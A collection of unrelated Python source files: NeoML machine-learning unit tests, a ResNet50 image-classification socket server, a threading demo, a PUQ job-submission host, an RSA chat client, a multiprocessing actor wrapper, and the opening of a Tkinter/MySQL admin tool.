self.assertAlmostEqual(getattr(loss, k), v, delta=1e-3,
msg='Field {} of {} differs'.format(k, layer))
self.assertEqual(getattr(loss, k), getattr(layer, k))
self.assertAlmostEqual(loss.last_loss, last_loss, delta=1e-3)
self.assertAlmostEqual(layer.last_loss, last_loss, delta=1e-3)
def _test_custom_loss(self, loss_calculator, result_loss):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
shape = (2, 3, 1, 1, 1, 1, 1)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
source3 = neoml.Dnn.Source(dnn, "source3")
loss = neoml.Dnn.CustomLoss((source1, source2, source3), name="loss", loss_weight=7.7,
loss_calculator=loss_calculator)
input1 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
input2 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
input3 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
inputs = {"source1": input1, "source2": input2, "source3": input3}
dir = tempfile.mkdtemp()
path = os.path.join(dir, 'custom_loss_dnn.arc')
dnn.store_checkpoint(path)
dnn_loaded = neoml.Dnn.Dnn(math_engine)
dnn_loaded.load_checkpoint(path)
os.remove(path)
os.rmdir(dir)
dnn_loaded.run(inputs)
layer = dnn_loaded.layers['loss']
self.assertEqual(layer.name, 'loss')
self.assertAlmostEqual(layer.last_loss, result_loss, delta=1e-3)
def test_custom_loss(self):
import neoml.AutoDiff as ad
for loss_calculator, result_loss in [
(BinaryCrossEntropyLossCalculator(), 0.313261),
(MulLossCalculator(), 0),
]:
self._test_custom_loss(loss_calculator, result_loss)
def test_autodiff_functions(self):
import neoml.AutoDiff as ad
math_engine = neoml.MathEngine.CpuMathEngine(1)
shape = (2, 3, 1, 1, 1, 2, 3)
const0 = ad.const(math_engine, shape, 0)
const2 = ad.const(math_engine, shape, 2)
ones = np.ones(shape, dtype=np.float32)
const_ones = ad.const(math_engine, shape, ones)
blob = neoml.Blob.asblob(math_engine, ones, shape)
self.assertTrue( np.equal( ad.add(const2, blob).asarray(), 3 * ones ).all() )
self.assertTrue( np.equal( ad.add(2, blob).asarray(), 3 * ones ).all() )
self.assertTrue( np.equal( (const2 + 3).asarray(), 5 * ones ).all() )
self.assertTrue( np.equal( ad.sub(const2, blob).asarray(), ones ).all() )
self.assertTrue( np.equal( ad.sub(const2, 0).asarray(), 2 * ones ).all() )
self.assertTrue( np.equal( (3 - blob).asarray(), 2 * ones ).all() )
self.assertTrue( np.equal( ad.mul(const2, 2).asarray(), 4 * ones ).all() )
self.assertTrue( np.equal( ad.mul(2, blob).asarray(), 2 * ones ).all() )
self.assertTrue( np.equal( (const0 * const2).asarray(), 0 * ones ).all() )
self.assertTrue( np.equal( ad.div(2, const2).asarray(), ones ).all() )
self.assertTrue( np.equal( ad.div(const2, 2).asarray(), ones ).all() )
self.assertTrue( np.equal( (const2 / const_ones).asarray(), 2 * ones ).all() )
self.assertTrue( np.equal( ad.max(const_ones, 2).asarray(), 2 * ones ).all() )
self.assertEqual( ad.sum(blob).asarray(), 36 )
self.assertEqual( ad.mean(blob).asarray(), 1 )
self.assertTrue( np.equal( ad.neg(blob).asarray(), -ones ).all() )
self.assertTrue( np.equal( (-blob).asarray(), -ones ).all() )
self.assertTrue( np.equal( ad.abs(-blob).asarray(), ones ).all() )
self.assertTrue( np.equal( ad.log(const_ones).asarray(), 0 * ones ).all() )
self.assertTrue( np.equal( ad.exp(const0).asarray(), ones ).all() )
self.assertTrue( np.equal( ad.clip(const2, 3, 4).asarray(), 3 * ones ).all() )
self.assertTrue( np.equal( ad.top_k(const2, 3).asarray(), [2, 2, 2] ).all() )
self.assertTrue( np.equal( ad.binary_cross_entropy(const0, const0, False).asarray(), 0 * ones ).all() )
self.assertTrue( np.equal( ad.sum(blob, [1]).asarray(), 3 * np.ones((2, 1, 1, 1, 1, 2, 3)) ).all() )
self.assertTrue( np.equal( ad.mean(blob, 1).asarray(), np.ones((2, 1, 1, 1, 1, 2, 3)) ).all() )
self.assertTrue( np.equal( ad.sum(blob, [0, 1]).asarray(), 6 * np.ones((1, 1, 1, 1, 1, 2, 3)) ).all() )
self.assertTrue( np.equal( ad.mean(blob, [1, 5]).asarray(), np.ones((2, 1, 1, 1, 1, 1, 3)) ).all() )
self.assertTrue( np.equal( ad.cumsum(blob, 1).asarray().reshape(shape), np.cumsum(ones, 1) ).all() )
self.assertTrue( np.equal( ad.concat([blob, blob, blob], axis=2).asarray(), np.ones((2, 3, 3, 2, 3)) ).all() )
self.assertTrue( np.equal((blob < 2 * blob).asarray(), ones).all() )
self.assertTrue( np.equal((blob < 2).asarray(), ones).all() )
self.assertTrue( np.equal((0 < blob).asarray(), ones).all() )
self.assertTrue( np.equal(ad.less(blob, 0).asarray(), 0 * ones).all() )
self.assertTrue( np.equal(ad.pow(2 * blob, 3 * blob).asarray(), 8 * ones).all() )
self.assertTrue( np.equal((2**blob).asarray(), 2 * ones).all() )
self.assertTrue( np.equal((blob**2).asarray(), ones).all() )
new_shape = (3, 3, 1, 1, 2, 2, 1)
ad.reshape(blob, new_shape)
self.assertTrue( np.equal(blob.shape, new_shape).all() )
broadcasted = ad.broadcast(blob, (3, 3, 2, 1, 2, 2, 2))
self.assertTrue( np.equal(broadcasted.asarray(), np.ones((3, 3, 2, 2, 2, 2))).all() )
def test_cross_entropy_loss(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
source3 = neoml.Dnn.Source(dnn, "source3")
loss = neoml.Dnn.CrossEntropyLoss((source1, source2, source3), True, 7.7, "loss")
layer = dnn.layers['loss']
self.assertEqual(layer.name, 'loss')
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 2), dtype=np.float32), (2, 3, 4, 1, 1, 1, 2))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.int32), (2, 3, 4, 1, 1, 1, 1))
input3 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2, "source3": input3}
dnn.run(inputs)
self.assertEqual(loss.apply_softmax, True)
self.assertAlmostEqual(loss.loss_weight, 7.7, delta=1e-3)
self.assertAlmostEqual(loss.last_loss, 0.6931, delta=1e-3)
self.assertEqual(loss.loss_weight, layer.loss_weight)
self.assertEqual(loss.last_loss, layer.last_loss)
def test_binary_cross_entropy_loss(self):
self._test_loss('BinaryCrossEntropyLoss',
dict(positive_weight=6.6, loss_weight=7.7),
last_loss=2.0675)
def test_euclidean_loss(self):
self._test_loss('EuclideanLoss', dict(loss_weight=7.7), last_loss=0.)
def test_hinge_loss(self):
self._test_loss('HingeLoss', dict(loss_weight=7.7), last_loss=0.)
def test_squared_hinge_loss(self):
self._test_loss('SquaredHingeLoss', dict(loss_weight=7.7), last_loss=0.)
def test_focal_loss(self):
self._test_loss('FocalLoss',
dict(force=6.6, loss_weight=7.7),
n_classes=5,
last_loss=0.)
def test_binary_focal_loss(self):
self._test_loss('BinaryFocalLoss', dict(force=6.6, loss_weight=7.7),
last_loss=0.)
def test_center_loss(self):
self._test_loss('CenterLoss',
dict(rate=6.6, loss_weight=7.7, class_count=3),
last_loss=1.,
labels_type=np.int32)
def test_multihinge_loss(self):
self._test_loss('MultiHingeLoss', dict(loss_weight=7.7), last_loss=0.)
def test_multisquaredhinge_loss(self):
self._test_loss('MultiSquaredHingeLoss', dict(loss_weight=7.7), last_loss=0.)
class DnnTestCase(MultithreadedTestCase):
def test_load_store(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
dnn.solver = neoml.Dnn.AdaptiveGradient(math_engine)
source = neoml.Dnn.Source(dnn, "source")
argmax = neoml.Dnn.Argmax(source, name="argmax")
sink = neoml.Dnn.Sink(argmax, "sink")
self.assertTrue(len(dnn.input_layers), 1)
self.assertTrue(len(dnn.layers), 3)
self.assertTrue(len(dnn.output_layers), 1)
dir = tempfile.mkdtemp()
path = os.path.join(dir, 'dnn.arc')
dnn.store_checkpoint(path)
dnn_loaded = neoml.Dnn.Dnn(math_engine)
dnn_loaded.load_checkpoint(path)
os.remove(path)
os.rmdir(dir)
self.assertTrue(isinstance(dnn_loaded.solver, neoml.Dnn.AdaptiveGradient))
self.assertTrue(len(dnn_loaded.input_layers), 1)
self.assertTrue(len(dnn_loaded.layers), 3)
self.assertTrue(len(dnn_loaded.output_layers), 1)
def test_solver(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
dnn.solver = neoml.Dnn.NesterovGradient(math_engine)
self.assertTrue(isinstance(dnn.solver, neoml.Dnn.NesterovGradient))
dnn.solver = neoml.Dnn.AdaptiveGradient(math_engine)
self.assertTrue(isinstance(dnn.solver, neoml.Dnn.AdaptiveGradient))
dnn.solver = neoml.Dnn.SimpleGradient(math_engine)
self.assertTrue(isinstance(dnn.solver, neoml.Dnn.SimpleGradient))
def test_initializer(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
random = neoml.Random.Random(0)
dnn = neoml.Dnn.Dnn(math_engine, random)
dnn.initializer = neoml.Dnn.Xavier(random)
self.assertTrue(isinstance(dnn.initializer, neoml.Dnn.Xavier))
dnn.initializer = neoml.Dnn.Uniform()
self.assertTrue(isinstance(dnn.initializer, neoml.Dnn.Uniform))
def test_math_engine(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
self.assertTrue(isinstance(dnn.math_engine, neoml.MathEngine.CpuMathEngine))
def test_default_math_engine(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
data = [1, 2]
first_blob = neoml.Blob.asblob(math_engine, np.array(data, dtype=np.int32), (2, 1, 1, 1, 1, 1, 1))
second_blob = first_blob.copy(neoml.MathEngine.default_math_engine())
self.assertEqual(second_blob.batch_len, 2)
self.assertEqual(list(second_blob.asarray()), data)
def test_properties(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
argmax = neoml.Dnn.Argmax(source, name="argmax")
sink = neoml.Dnn.Sink(argmax, "sink")
self.assertTrue(len(dnn.input_layers), 1)
self.assertTrue(len(dnn.layers), 3)
self.assertTrue(len(dnn.output_layers), 1)
class TraditionalTestCase(MultithreadedTestCase):
def test_differential_evolution(self):
from neoml.DifferentialEvolution import IntTraits, DoubleTraits, DifferentialEvolution
def func(vec):
return sum([x**2 for x in vec])
for dim, param_traits, max_gen_count, result_traits, population in (
(1, None, None, None, 50),
(10, [IntTraits()] * 5 + [DoubleTraits()] * 5, 10, DoubleTraits(), 100),
):
diff_evo = DifferentialEvolution(func, [-5] * dim, [5] * dim,
param_traits=param_traits, result_traits=result_traits,
max_generation_count=max_gen_count, population=population)
diff_evo.build_next_generation()
diff_evo.run()
self.assertEqual(diff_evo.build_next_generation(), True)
res_population = np.array(diff_evo.population)
self.assertEqual(res_population.shape, (population, dim))
eval_population = np.array(diff_evo.population_function_values)
self.assertEqual(eval_population.shape, (population,))
optimal_vector = np.array(diff_evo.optimal_vector)
self.assertEqual(optimal_vector.shape, (dim,))
def _test_classification_model(self, model, params, is_binary=False):
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
val = 1 if is_binary else 3
y = val * np.ones(20, dtype=np.int32)
if not is_binary: # every class should be represented in dataset
for i in range(3):
y[i] = i
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
classifier = model(**params).train(X, y, weight)
pred = classifier.classify(X[-3:])
print(pred, np.argmax(pred))
self.assertTrue(np.equal(np.argmax(pred), [val, val, val]).all())
def _test_regression_model(self, model, params):
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
y = np.ones(20, dtype=np.int32)
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
regressor = model(**params).train(X, y, weight)
pred = regressor.predict(X[0:3])
self.assertEqual(pred.shape, (3,))
def test_gradient_boosting_classification(self):
for loss, builder_type, thread_count, is_binary in itertools.product(
('binomial', 'exponential', 'squared_hinge', 'l2'),
('full', 'hist', 'multi_full', 'multi_hist'), (1, 4), (False, True)):
self._test_classification_model(neoml.GradientBoost.GradientBoostClassifier,
dict(loss=loss, iteration_count=10, builder_type=builder_type, thread_count=thread_count),
is_binary=is_binary)
def test_gradient_boosting_regression(self):
for builder_type, thread_count in itertools.product(('full', 'hist'), (1, 4)):
self._test_regression_model(neoml.GradientBoost.GradientBoostRegressor,
dict(iteration_count=10, builder_type=builder_type, thread_count=thread_count))
def test_decision_tree_classification(self):
for criterion, is_binary in itertools.product(('gini', 'information_gain'), (False, True)):
self._test_classification_model(neoml.DecisionTree.DecisionTreeClassifier,
dict(criterion=criterion), is_binary=is_binary)
for multiclass_mode in ('single_tree', 'one_vs_all', 'one_vs_one'):
self._test_classification_model(neoml.DecisionTree.DecisionTreeClassifier, dict(multiclass_mode=multiclass_mode))
def test_svm_classification(self):
for kernel, thread_count, is_binary in itertools.product(('linear', 'poly', 'rbf', 'sigmoid'),
(1, 4), (False, True)):
self._test_classification_model(neoml.SVM.SvmClassifier,
dict(kernel=kernel, thread_count=thread_count), is_binary=is_binary)
for multiclass_mode in ('one_vs_all', 'one_vs_one'):
print('svm ', multiclass_mode)
self._test_classification_model(neoml.SVM.SvmClassifier, dict(multiclass_mode=multiclass_mode))
def test_linear_classification(self):
for loss, thread_count, is_binary in itertools.product(('binomial', 'squared_hinge', 'smoothed_hinge'),
(1, 4), (False, True)):
self._test_classification_model(neoml.Linear.LinearClassifier,
dict(loss=loss, thread_count=thread_count), is_binary=is_binary)
for multiclass_mode in ('one_vs_all', 'one_vs_one'):
self._test_classification_model(neoml.Linear.LinearClassifier, dict(multiclass_mode=multiclass_mode))
def test_linear_regression(self):
for thread_count in (1, 4):
self._test_regression_model(neoml.Linear.LinearRegressor,
dict(thread_count=thread_count))
def test_cross_validation_score(self):
from neoml.CrossValidation import cross_validation_score
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
y = np.ones(20, dtype=np.int32)
weight = np.ones(20, dtype=np.float32)
for X in (X_dense, X_dense_list, X_sparse):
for classifier, score in itertools.product(
( neoml.Linear.LinearClassifier(),
neoml.GradientBoost.GradientBoostClassifier(),
neoml.SVM.SvmClassifier(),
neoml.DecisionTree.DecisionTreeClassifier()
), ('accuracy', 'f1')):
cv_score = cross_validation_score(classifier, X, y, weight, score, 5)
self.assertEqual(cv_score.shape, (5,))
def test_load_store(self):
dir = tempfile.mkdtemp()
for model_init, model_result in (
(neoml.DecisionTree.DecisionTreeClassifier, neoml.DecisionTree.DecisionTreeClassificationModel),
(neoml.GradientBoost.GradientBoostRegressor, neoml.GradientBoost.GradientBoostRegressionModel)):
path = os.path.join(dir, 'test')
pickled = model_init().train([[1]], [1])
with open(path, 'wb') as file:
pickle.dump(pickled, file)
with open(path, 'rb') as file:
loaded = pickle.load(file)
self.assertEqual(type(loaded), model_result)
os.remove(path)
os.rmdir(dir)
class ClusteringTestCase(MultithreadedTestCase):
def _test_clusterize(self, method, params={}):
X_dense = np.eye(20, 5, dtype=np.float32)
X_dense_list = X_dense.tolist()
X_sparse = sparse.csr_matrix(X_dense)
weight = np.ones(20, dtype=np.float32)
method = getattr(neoml.Clustering, method)(**params)
for X in (X_dense, X_dense_list, X_sparse):
clusters = method.clusterize(X, weight)
self.assertEqual(clusters[0].shape, (20,))
self.assertEqual(clusters[1].shape[1], 5)
self.assertEqual(clusters[2].shape[1], 5)
def test_first_come(self):
self._test_clusterize('FirstCome', dict(threshold=0.01))
def test_hierarchical(self):
self._test_clusterize('Hierarchical', dict(max_cluster_distance=2, min_cluster_count=6))
def test_iso_data(self):
self._test_clusterize('IsoData', dict(init_cluster_count=6, max_cluster_count=10,
min_cluster_size=1, max_iteration_count=10, min_cluster_distance=0.1,
max_cluster_diameter=2, mean_diameter_coef=2))
def test_kmeans(self):
self._test_clusterize('KMeans', dict(max_iteration_count=100, cluster_count=6, init='k++'))
|
server.py | '''
Assignment 2
Server for image classification
Author: fanconic
'''
import base64
from threading import Thread
from queue import Queue
from PIL import Image
import socket, json
from keras.preprocessing import image
from keras.applications.resnet50 import ResNet50, preprocess_input, decode_predictions
from io import BytesIO
import numpy as np
import time
queue = Queue()
PORT = 50002
ADDRESS = 'localhost'
# Listen for incoming connections
def main_thread():
# Busy Waiting
# Create a socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind socket to localhost
server_socket.bind((ADDRESS, PORT))
# Listen for incoming connections from clients
server_socket.listen(10)
while True:
# Receive data from client
(client_socket, address) = server_socket.accept()
queue.put(client_socket)
# Receive data from clients, decode, and feed into neural network
def second_thread():
# ResNet50 Model adn Predicitons
model = ResNet50(weights='imagenet')
while True:
client_socket = queue.get()
# Receive TCP and check with end string, if everything has arrived
data = ''
while True:
part = client_socket.recv(1024)
data += part.decode('utf-8')
if '##END##' in data:
break
# laod from JSON file and replace the end string
data = data.replace('##END##', '')
data = json.loads(data)
# Get variables from dict
chat_id = data['chat_id']
encoded_image = data['encoded_image']
img = base64.b64decode(encoded_image)
# Convert picture from bytes to image
# https://www.programcreek.com/python/example/89218/keras.preprocessing.image.img_to_array
img = Image.open(BytesIO(img))
# Keras ResNet50 uses 224 X 224 images
img = img.resize((224,224))
# Write the picture to an array
X = image.img_to_array(img)
# Adding additional axis
X = np.expand_dims(X, axis=0)
# Preprocess the input
X = preprocess_input(X)
pred = model.predict(X)
pred = decode_predictions(pred)
# Process Predictions
predictions = []
for i in range (5):
predictions.append({'Label': pred[0][i][1], 'Probability': str(pred[0][i][2])})
# prepare data to be sent back
data = {
'chat_id': chat_id,
'predictions': predictions
}
data = json.dumps(data) + '##END##'
try:
# Send back data
client_socket.sendall(data.encode('utf-8'))
finally:
# Close socket
client_socket.close()
if __name__ == "__main__":
Thread(target= main_thread).start()
Thread(target= second_thread).start()
while True:
time.sleep(10)
|
Event_test.py | # coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
import time
event = threading.Event()
def cal(name):
# 等待事件,进入等待阻塞状态
print('%s 启动' % threading.currentThread().getName())
print('%s 准备开始计算状态' % name)
event.wait() # ①
# 收到事件后进入运行状态
print('%s 收到通知了.' % threading.currentThread().getName())
print('%s 正式开始计算!'% name)
# 创建并启动两条,它们都会①号代码处等待
threading.Thread(target=cal, args=('甲', )).start()
threading.Thread(target=cal, args=("乙", )).start()
time.sleep(2) #②
print('------------------')
# 发出事件
print('主线程发出事件')
event.set() |
submithost.py | """
This file is part of PUQ
Copyright (c) 2013 PUQ Authors
See LICENSE file for terms.
"""
from __future__ import absolute_import, division, print_function
import os, time, sys
from .monitor import TextMonitor
from subprocess import Popen, PIPE
import numpy as np
from logging import debug
from .hosts import Host
from shutil import rmtree
from stat import S_ISDIR
from glob import glob
from threading import Thread, Event
class SubmitHost(Host):
"""
Create a host object that uses the hub submit command.
Args:
cpus: Number of cpus each process uses. Default=1.
cpus_per_node: How many cpus to use on each node. Default=1.
"""
def __init__(self, venue=None, cpus=1, cpus_per_node=1, walltime=60):
Host.__init__(self)
self.cpus = cpus
self.cpus_per_node = cpus_per_node
self.hostname = venue
self.jobs = []
# Creates a CSV file compatible with the HubZero submit command
def add_jobs(self, fname, args):
import shlex
self.fname = fname
first = True
try:
os.mkdir(fname)
except:
pass
f = open(os.path.join(fname, 'input.csv'), 'w')
for a in args:
if first:
first = False
print(', '.join(['@@'+b[0] for b in a]), file=f)
cmds = [(x[0], '@@'+x[0]) for x in a]
print(','.join([str(b[1]) for b in a]), file=f)
f.close()
venue == ''
if self.hostname is not None:
if self.hostname == 'local':
venue = '--local'
else:
venue = '--venue %s' % self.hostname
scmd = "submit %s --runName=puq -d input.csv %s" % (venue, self.prog.cmd(cmds))
self.add_job(shlex.split(scmd), '', 0, '')
# run, monitor and status return
# True (1) is successful
# False (0) for errors or unfinished
def run(self):
""" Run all the jobs in the queue """
self._running = []
self._monitor = TextMonitor()
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
err = self._run()
os.chdir(cwd)
if err == False:
rmtree(self.fname, ignore_errors=True)
try:
os.remove(self.fname+'.hdf5')
except:
pass
return False
return True
def peg_parse(self):
# parse the contents of the pegasusstatus.txt file
done = 0
filename = 'pegasusstatus.txt'
with open(filename) as f:
for line in f:
if line.startswith('%DONE'):
done = float(line.split()[1])
break
return done
def status_monitor(self):
# Watch pegasusstatus.txt for status changes.
# This could possibly be done more efficiently
# using filesystem notification but in practice
# this turned out to be more reliable across
# different OS versions.
found = False
while not found and not self.stop.is_set():
try:
os.chdir('puq/work')
found = True
except:
self.stop.wait(10)
done = -1
while not self.stop.is_set():
try:
d = self.peg_parse()
except:
d = done
if d > done:
print('=RAPPTURE-PROGRESS=>%d Running' % (int(d)))
sys.stdout.flush()
done = d
if int(d) >= 100:
self.stop.set()
else:
self.stop.wait(10)
def _run(self):
j = self.jobs[0]
print('=RAPPTURE-PROGRESS=>0 Starting')
sys.stdout.flush()
try:
myprocess = Popen(j['cmd'], bufsize=0)
except Exception as e:
print('Command %s failed: %s' % (' '.join(j['cmd']), e))
sys.stdout.flush()
self.stop = Event()
p2 = Thread(target=self.status_monitor)
p2.daemon = True
p2.start()
# wait for command to finish
err = True
try:
ret = myprocess.wait()
if ret:
err = False
print('Submit failed with error %s' % ret)
whocares = os.listdir(os.getcwd())
if os.path.exists('puq'):
fn = glob('puq/*.stderr')
if fn:
with open(fn[0]) as f:
print(f.read())
sys.stdout.flush()
except KeyboardInterrupt:
print('\nPUQ interrupted. Cleaning up. Please wait...\n')
err = False
myprocess.kill()
j['status'] = 'F'
self.stop.set()
if p2 and p2.is_alive():
p2.join()
return err
# Collect the data from individual stdout and stderr files into
# the HDF5 file. Remove files when finished.
def collect(self, hf):
# Collect results from output files
debug("Collecting")
cwd = os.path.abspath(os.getcwd())
os.chdir(self.fname)
hf.require_group('output')
jobs_grp = hf.require_group('output/jobs')
# find the jobs that are completed and, if the stdout/stderr files are there,
# move them to hdf5
finished_jobs = []
os.chdir('puq')
# Get the job stats. Do this in a loop because it looks like
# sometimes this code gets run before pegasus generates the file.
tries = 2
while tries > 0:
try:
data = np.genfromtxt('pegasusjobstats.csv', usecols=(2,3,4,7,15,16), dtype='string',
skip_header=26, comments='#', delimiter=',')
tries = 0
except:
tries -= 1
if tries > 0:
time.sleep(30)
job = {}
for j, _try, site, _time, exitcode, host in data:
if site == 'local':
continue
j = j[j.rfind('_')+1:]
job[j] = (int(_try), site, float(_time), int(exitcode), host)
times = np.empty((len(job)))
for j in job:
jobnum = int(j)-1
times[jobnum] = job[j][2]
finished_jobs.append(jobnum)
if not S_ISDIR(os.stat(j).st_mode):
print("ERROR: job %s directory not found" % j)
continue
os.chdir(j)
grp = jobs_grp.require_group(str(jobnum))
for ext in ['out', 'err']:
outfile = glob('*.std%s' % ext)
if outfile:
f = open(outfile[0], 'r')
fdata = f.read()
grp.create_dataset('std%s' % ext, data=fdata)
if job[j][3] != 0:
# error code was set
print("ERROR: Job %s failed: %s" % (j, fdata))
f.close()
for fn in self.prog.outfiles:
try:
f = open(fn, 'r')
grp.create_dataset(fn, data=f.read())
f.close()
except:
pass
os.chdir('..')
if 'time' in jobs_grp:
del jobs_grp['time']
jobs_grp['time'] = times
os.chdir(cwd)
rmtree(self.fname)
return finished_jobs
|
amsg_cli.py | #!env/bin/python3
import sys
import socket
import threading
import time
import signal
import argparse
import sqlite3
import parser
import rsa
import socks
class client:
def __init__(self,ip='localhost',port='9999',mode='0'):
#just to support srv variable
self.clients = 1
self.srv_info = [(ip,port)]
self.name = input("Enter you username for session:")
self.pubkey,self.privkey = rsa.newkeys(1024)
if(mode=='tor'):
self.cli = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
self.cli.set_proxy(socks.SOCKS5,"localhost",9050)
elif(mode=='0'):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.cli.connect((ip,port))
except socket.gaierror as e:
print("Error:",e)
self.cli.close()
sys.exit(1)
signal.signal(signal.SIGINT, self.sighandler)
def sighandler(self, signum, frame):
print("Shutting down connection")
self.cli.close()
sys.exit(0)
def snd_msg(self, msg):
try:
msg = rsa.encrypt(msg.encode('utf-8'),self.srv_info[2])
x = self.cli.send(msg)
return 1
except socket.error as e:
print("Error:",e)
self.cli.close()
sys.exit(1)
def rcv_msg(self,name):
while True:
try:
data = self.cli.recv(1024)
if(len(data)!=0):
msg = rsa.decrypt(data,self.privkey)
msg = msg.decode('utf-8')
con2 = sqlite3.connect('amsg.db')
cur2 = con2.cursor()
cur2.execute('insert into chat(sender,msg,time) values(?,?,?)',(name,msg,time.ctime(time.time())))
con2.commit()
except socket.error as e:
print("Error:",e)
self.cli.close()
print("connection closed ):")
return
except KeyboardInterrupt:
return 1
def rcv_info(self):
try:
data = self.cli.recv(1024)
if(len(data)!=0):
data = str(data.decode('utf-8'))
data = data.split(',')
name = data[0]
#srv_pubk = rsa.PublicKey(int(data[1]),int(data[2]))
try:
con = sqlite3.connect('amsg.db')
cur = con.cursor()
cur.execute('insert into User(username,ip,status,join_time) values(?,?,?,?)',(name,self.srv_info[0][0],1,time.ctime(time.time())))
con.commit()
con.close()
print(name, "stored in db")
return data[0],data[1],data[2]
except sqlite3.Error as e:
print("Error with in db:",e)
self.cli.close()
except socket.error as e:
print("Error occured",e,"No connecton established with",self.srv_info[0])
self.cli.close()
def snd_info(self):
n = str(self.pubkey.n)
e = str(self.pubkey.e)
info = self.name+','+n+','+e
try:
self.cli.send(info.encode('utf-8'))
except socket.error as e:
print("Error with server:",e)
self.cli.close()
sys.exit(0)
return 1
X = client(parser.ip, parser.port,parser.mode)
try:
# rcv_msg from srv
(name,n,e) = X.rcv_info()
srv_pubk = rsa.PublicKey(int(n),int(e))
X.srv_info.append(name)
X.srv_info.append(srv_pubk)
#snd info for srv
p = X.snd_info()
if (p and name):
print("Connection successful with server")
else:
print("error")
thread = threading.Thread(target=X.rcv_msg, args=[name])
thread.start()
except Exception as E:
print(E)
print("Error occured within thread")
sys.exit(1)
|
__init__.py | import multiprocessing
from pkg_resources import get_distribution, DistributionNotFound
try:
__version__ = get_distribution(__name__).version
except DistributionNotFound:
# package is not installed
pass
class Actor:
__close_message__ = '_*CLOSE*_'
"""
Wraps a pickleable class as an actor to run in a dedicated process.
The returned Actor instance has a .proxy attribute that should be used
to invoke the methods of the wrapped class.
"""
def __init__(self, actor_instance):
# Initialize a queue that can be shared across processes
manager = multiprocessing.Manager()
self.queue = manager.Queue()
# Initialize the underlying instance and process
setattr(actor_instance, 'enqueue', EnqueueDirectCall(self.queue))
self.actor_process = multiprocessing.Process(target=self.__run_actor__, args=(self.queue, actor_instance))
self.actor_process.start()
# Build the proxy
self.proxy = Proxy()
for attr in dir(actor_instance.__class__):
if callable(getattr(actor_instance, attr)) and not attr.startswith('__'):
setattr(self.proxy, attr, EnqueueNamedCall(self.queue, attr))
def close(self):
""" Closes the actor process """
self.queue.put_nowait((self.__close_message__,))
def join(self):
""" Joins the calling thread to the process for the actor. """
self.actor_process.join()
def __run_actor__(self, queue, actor_instance):
""" Runs the actor process by reading from the queue and executing serially. """
while True:
task = queue.get() # Will block until a task is available
name = task[0]
if name == self.__close_message__:
return
target = getattr(actor_instance, name)
if len(task) > 1:
args = task[1]
target(*args)
else:
target()
class Proxy:
""" An empty class definition used to create a proxy for an Actor """
pass
class EnqueueNamedCall:
"""
A callable that writes to a queue. The tuple value written to the queue includes the name specified
when creating the QueueRedirect as well as the arguments passed to the call.
"""
def __init__(self, queue, name):
self.queue = queue
self.name = name
def __call__(self, *args):
self.queue.put_nowait((self.name, args))
class EnqueueDirectCall:
"""
A callable that writes to a queue from a callable target. The tuple value written to the queue includes the
name of the callable_target as well as the arguments passed to the call.
"""
def __init__(self, queue):
self.queue = queue
def __call__(self, callable_target, *args):
self.queue.put_nowait((callable_target.__name__, args))
|
Admin.py | from tkinter import *
from tkinter import ttk
from tkinter import tix
from tkinter import filedialog
from tkscrolledframe import ScrolledFrame
from ttkwidgets import CheckboxTreeview
from math import *
from platform import *
from tkinter import messagebox
from datetime import *
import mysql.connector
import threading
import pandas as pd
from random import randint
class Database_Server():
def connection_database(self):
try:
self.bancoServer = mysql.connector.connect(
host='10.0.0.65',
database='empresa_funcionarios',
user='MultimoldesAdmin',
password='')
self.bancoServer.autocommit = True
self.cursor = self.bancoServer.cursor()
self.bancoConnect = True
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
self.bancoConnect = False
def encerrando_conexao_database(self):
self.bancoServer.close()
self.cursor.close()
class Funcs():
def verificar_campos_cadastro(self, parametro):
#Atribuição dos campos cadastrais nas variáveis
a = self.campoNome.get()
b = self.campoCPF.get()
c = self.campoSenha.get()
d = self.campoConfirmaSenha.get()
e = self.campoFuncao.get()
f = self.campoFone.get()
g = self.campoNasc.get()
#Verificando se algum campo não foi preenchido
